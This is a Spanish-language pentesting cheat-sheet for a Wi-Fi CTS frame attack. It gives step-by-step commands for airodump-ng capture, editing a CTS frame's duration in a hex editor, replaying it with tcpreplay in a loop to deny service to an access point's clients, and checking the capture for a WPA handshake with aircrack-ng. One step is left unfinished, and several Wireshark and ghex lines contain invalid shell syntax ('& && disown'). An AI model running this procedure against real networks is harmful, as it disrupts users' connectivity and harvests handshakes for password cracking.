CTS Frame Attack *

Ataque usado para la obtención de handshake. Se inyectan tramas CTS en la red para secuestrar el ancho de banda y forzar que los clientes se desasocien del AP, para posteriormente reautenticarse.


  • Capturar tráfico con Airodump-ng

sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
  • En paralelo, analizar con Tshark el fichero de tráfico capturado (puede filtrar por campo "wlan.duration" para ver transmisión en microsegundos de paquetes CTS)

tshark -r traffic_file.cap -Y "wlan.fc.type_subtype==28" -Tjson
tshark -r traffic_file.cap -Y "wlan.fc.type_subtype==28" -Tfields -e wlan.duration | sort -u
  • Abrir con Wireshark fichero de tráfico capturado

wireshark traffic_file.cap > /dev/null 2>&1 & && disown
  • Desde Wireshark, aplica filtro para paquetes CTS

wlan.fc.type_subtype==28
  • Seleccionar un solo paquete. Luego guardar desde ARCHIVO -> EXPORTAR PAQUETES ESPECIFICADOS

  • Asignar nuevo nombre al fichero: CTS-attack

  • Exportar como: Wireshark/tcpdump/... - pcap

  • Solo paquetes seleccionados

  • Darle a guardar y cerrar Wireshark

  • Abrir fichero CTS-attack.pcap con ghex

ghex CTS-attack.pcap > /dev/null 2>&1 & && disown
  • Convertir 30000 microsegundos a hexadecimal con bash (con espacio)

printf "%x\n" 30000 | awk '{ print substr($0, 3, 2), substr($0, 1, 2) }'
  • Convertir 30000 microsegundos a hexadecimal con bash (sin espacio)

printf "%x\n" 30000 | awk '{ printf "%s%s\n", substr($0, 3, 2), substr($0, 1, 2) }'
  • Modificar los bytes de tiempo originales por los creados y guardar el fichero modificado

EN CONTRUCCIÓN...
  • Abrir con Wireshark el fichero CTS-attack.pcap modificado para revisar los cambios

wireshark CTS_attack_frame_modificado.pcap > /dev/null 2>&1 & && disown
  • Inyectar el frame modificado en la red con TCPreplay para secuestrar el ancho de banda y generar un ataque de denegación de servicio a los clientes del AP.

tcpreplay --intf1=wlan0 --topspeed --loop=2000 CTS_attack_frame_modificado.pcap
  • Analizar presencia de handshake con Aircrack-ng en captura de tráfico

sudo aircrack-ng traffic_file.cap